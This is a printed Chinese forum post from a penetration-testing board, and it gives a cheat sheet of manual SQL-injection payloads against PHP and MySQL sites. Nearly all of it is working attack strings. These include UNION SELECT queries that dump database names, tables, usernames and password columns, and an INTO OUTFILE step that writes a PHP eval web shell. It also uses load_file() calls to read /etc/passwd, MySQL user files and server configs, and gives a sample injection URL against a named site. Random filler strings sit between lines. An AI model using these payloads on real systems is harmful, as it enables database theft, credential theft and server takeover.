中国网络渗透测试联盟
标题:
PHP+MySQL 手工注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 13:50
标题:
PHP+MySQL 手工注入语句
.
1 M3 ^% V. g) Q7 U3 j
1 p5 t/ p9 |6 N1 d. G
暴字段长度
: y& ` O6 H3 G& ^
Order by num/*
$ v6 I+ o9 p! ]* a/ a- G: w
匹配字段
" e# ]( ^' F+ j& i7 o
and 1=1 union select 1,2,3,4,5…….n/*
" ]8 n7 _& T8 p" [9 T+ O% V
暴字段位置
( l) g. ?( B4 Z* |. W
and 1=2 union select 1,2,3,4,5…..n/*
1 M3 C4 K3 ?8 B
利用内置函数暴数据库信息
$ L/ v0 M* T4 R7 }/ O$ T
version() database() user()
) \: Q# w% N" i% a+ e8 @
不用猜解可用字段暴数据库信息(有些网站不适用):
+ Y1 e( x/ O9 x2 k' P
and 1=2 union all select version() /*
3 V( t: Q3 K- B7 i
and 1=2 union all select database() /*
! \4 ?& ^4 F2 T5 C
and 1=2 union all select user() /*
2 m# C* u& q: Y
操作系统信息:
+ X# {6 J9 V& F
and 1=2 union all select @@global.version_compile_os from mysql.user /*
) {( |2 K* @+ R/ i6 w* A
数据库权限:
! U2 H% V- P/ a( G- h7 g1 o. Q" i
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
; {8 _7 D3 J+ q
暴库 (mysql>5.0)
' F( \1 K B% T& Z' E% f+ S
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
. c* s) O* _. ~/ ?& W S
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
- ?, B( t# @6 |' p( ~
猜表
& t1 r# F* K/ L& k8 A" I
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
4 `6 S2 z# o( X1 n& i$ n- F
猜字段
) x, d }3 k: W$ ]! M
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
) Q2 Q$ j k. r& @& y& V {! Y; R
暴密码
7 L1 |* O- ^# y* G% N
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
9 M) u3 w$ ~ V, C3 M
高级用法(一个可用字段显示两个数据内容):
( x9 k& k) J+ y# ~! L/ d; F, P
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
; y0 T% `3 C* p8 Y( y8 k8 t5 _
直接写马(Root权限)
P" ?0 T d6 Q+ D& A
条件:1、知道站点物理路径
$ C: G. t: n3 J6 V$ B
2、有足够大的权限(可以用select …. from mysql.user测试)
; `! W/ e8 Y, u$ L
3、magic_quotes_gpc()=OFF
3 Z$ z# T3 N( F( `
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
, [( }" {" B: j/ n' o" y* H. h5 e
and 1=2 union all select 一句话HEX值 into outfile '路径'
' F8 R( O) m9 b- P' a8 w. M
load_file() 常用路径:
7 y! _4 n# D. o' f0 i' O" x* q
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2 g0 n' X0 L4 K3 g5 F. [. Y7 \
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
! W0 ]" U4 p3 X) f9 @, G
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
' f6 Y% H0 f: M1 \2 n) N
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
) r8 @) E g3 D3 v( p
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
9 b0 f7 K" @" ?
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
) G* K! a, N) L( v4 b" @$ Q4 _9 H! }
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
8 m5 u5 }0 A4 G# S6 L+ `3 F: r9 F% L6 u
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
6 N8 x$ ? L, x L, o/ f
8、d:\APACHE\Apache2\conf\httpd.conf
0 r' y- }- S4 A% q
9、C:\Program Files\mysql\my.ini
7 ?: A( T' E* g. i& k2 |! j/ @
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
9 j, g. H7 d0 t" C% u6 `
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
0 K6 s% o9 w. G [
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
3 C6 D4 i0 E( \( n7 k. b0 z3 `
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
- Q0 z7 O0 J3 l8 B- X; i0 W7 b
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
( y5 f, H6 |! H$ i( u
15、 /etc/sysconfig/iptables 本看防火墙策略
! H) g0 F) @! V; Q
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
$ S8 g0 A. o7 [
17 、/etc/my.cnf MYSQL的配置文件
2 \ s2 }8 w$ y$ Z2 I
18、 /etc/redhat-release 红帽子的系统版本
# P- t2 s8 c: v9 a* @" F
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
V* o+ o( W) X) K: Z1 ~' |) U3 z
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
3 d. M3 p1 M' I% v; A# M
21、/usr/local/app/php5 b/php.ini //PHP相关设置
" }5 J* [5 R7 N5 b/ C# w4 L
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
& ]7 t* G$ K1 N9 z" ^
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
! A4 T# @* C2 ^; B: w3 a1 u
24、c:\windows\my.ini
1 z+ c( p! N$ G+ y7 C
25、c:\boot.ini
0 f4 i% P4 j* d
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
0 }; p8 m6 y$ i& F
注:
' K$ v; Q; D; R/ F- X$ `6 x3 ^
Char(60)表示 <
7 O. p( i4 K0 k6 m$ [
Char(32)表示 空格
$ B, y; w' |# }6 _5 Q
手工注射时出现的问题:
2 W# G" x9 ?& q K) P+ `$ `" o
当注射后页面显示:
; `3 V- L* [2 D2 F
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
' J7 [0 { w$ \2 G* K+ D) x9 @# k' ?# x
如:
http://www.hake.ccc./mse/researc ... 0union%20select%201
,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
! |% U4 t8 O- \
这是由于前后编码不一致造成的,
9 s2 N: k. Z( g; E- Z* W& |
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
0 q! i, ?, E7 V; S2 Q! f& H
http://www.hake.cc/mse/research/ ... 0union%20select%201
,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
8 s$ e! K: ^; x5 p$ o
既可以继续注射了。。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2